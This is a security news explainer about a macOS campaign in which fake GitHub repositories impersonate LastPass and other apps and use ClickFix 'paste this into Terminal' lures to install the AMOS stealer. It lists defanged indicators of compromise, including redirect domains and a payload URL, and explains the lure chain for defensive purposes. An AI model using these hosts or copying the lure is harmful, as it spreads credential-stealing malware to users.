Cybercriminals are disguising fake password managers as legitimate apps to deliver LastPass malware through fraudulent GitHub repositories. The attack targets macOS users with ClickFix attacks, tricking them into pasting malicious commands into Terminal. At the center of this campaign is AMOS malware (Atomic Stealer), a dangerous macOS malware designed to steal passwords, banking data, and cryptocurrency wallets. With over 100 popular apps impersonated, including LastPass, 1Password, and Dropbox, this campaign highlights how trusted platforms can be weaponized for large-scale cybercrime.

TL;DR

Hackers are spreading LastPass malware on macOS by disguising fake password managers in fraudulent GitHub repositories. The attack uses ClickFix attacks to trick users into pasting Terminal commands, installing AMOS malware (Atomic Stealer). Over 100 apps, including LastPass and 1Password, are impersonated. The best defense: download only from official sites, avoid unknown commands, and verify app sources.

How the Fake Password Managers Work

Attackers created more than 100 GitHub repositories posing as trusted apps. Some of the impersonated applications include 1Password, LastPass, Dashlane, RoboForm, Keeper, NordPass, Dropbox, Notion, Robinhood, and Adobe After Effects.

These repositories look professional, complete with download buttons that redirect users to malicious domains. Once there, victims are instructed to paste commands into macOS Terminal.

The command runs a Base64-encoded curl request that downloads AMOS malware (install.sh) into the /tmp directory. This gives attackers system access. With recent updates, AMOS malware now includes a backdoor, making it persistent and harder to remove, raising the risk of long-term macOS malware infections.

What Is AMOS Malware?

AMOS malware, short for Atomic Stealer, is a malware-as-a-service offered for around $1,000 per month. It specializes in stealing:

• Login credentials
• Browser cookies and autofill data
• Banking and credit card information
• Cryptocurrency wallet keys

Since surfacing in April 2023, AMOS has become a staple tool among financially motivated crime groups. The integration of fake password managers into its delivery method has increased its reach significantly among macOS malware campaigns.

ClickFix Attacks on macOS

ClickFix attacks exploit users’ trust in Terminal commands. Once pasted, the script executes silently, dropping AMOS malware onto the device.

These ClickFix attacks are not new. Past campaigns have impersonated Booking.com and fake macOS troubleshooting utilities. Criminals are clearly refining this approach to spread macOS malware more effectively, often combining it with SEO tricks to make malicious GitHub repositories rank high in search results.

Recent Case Study: LastPass Impersonation on GitHub Pages

Screen Capture of the LastPass Impersonation Page Pic Court: LastPass

The LastPass TIME team (Threat Intelligence, Mitigation, and Escalation) recently tracked a wave of GitHub-based attacks impersonating LastPass.

• On 16 September, a GitHub user named modhopmduck476 created two fake LastPass repositories.
• These included links labeled “Install LastPass on MacBook.”
• Clicking redirected victims through:
  • ahoastock825[.]github[.]io/.github/lastpass → then to
  • macprograms-pro[.]com/mac-git-2-download.html
• That page asked users to paste a Terminal command, which decoded to:
  • bonoud[.]com/get3/install.sh

The script delivered an “Update” payload into the Temp folder, which was actually AMOS malware.

To aid defenders, LastPass published Indicators of Compromise (IoCs), including the malicious GitHub repositories, redirect domains, and payload URLs.

How to Protect macOS from LastPass Malware Attacks

To defend against LastPass malware and related macOS malware threats:

• Download apps only from official vendor websites, not third-party mirrors or shady GitHub repositories.
• Avoid running Terminal commands you don’t understand; this is the main trick behind ClickFix attacks.
• Treat cracked apps and unofficial macOS ports with suspicion; many deliver AMOS malware.
• Verify whether an app posing as a password manager is legitimate; attackers abuse fake password managers.
• Be cautious of SEO-promoted search results that redirect to unfamiliar domains.
  

To Sum Up

The LastPass malware campaign shows how hackers are combining fake password managers, GitHub repositories, and ClickFix attacks to spread AMOS malware on macOS systems. With AMOS evolving into a more persistent macOS malware, the threat level is rising. The solution is simple but vital: stick to official download sources, avoid unknown Terminal commands, and stay alert to suspicious redirects. In a world where even trusted platforms are abused, vigilance is the only effective defense.

FAQs

1. What is LastPass malware?
   LastPass malware is a malicious campaign that impersonates trusted apps, especially password managers, to spread AMOS malware on macOS devices.
2. What is AMOS malware?
   AMOS (Atomic Stealer) is a macOS malware-as-a-service sold for $1,000/month. It steals login credentials, browser data, financial details, and crypto wallets.
3. How do ClickFix attacks work?
   ClickFix attacks trick users into pasting commands into macOS Terminal. These commands silently install malware, including AMOS malware.
4. Which apps are being impersonated?
   Over 100 apps have been spoofed, including LastPass, 1Password, Dashlane, RoboForm, Keeper, NordPass, Dropbox, Notion, Robinhood, and Adobe After Effects.
5. How can I protect my Mac from LastPass malware?
   Always download apps from official websites, avoid shady GitHub repositories, and never run unknown Terminal commands. Staying cautious helps prevent infection.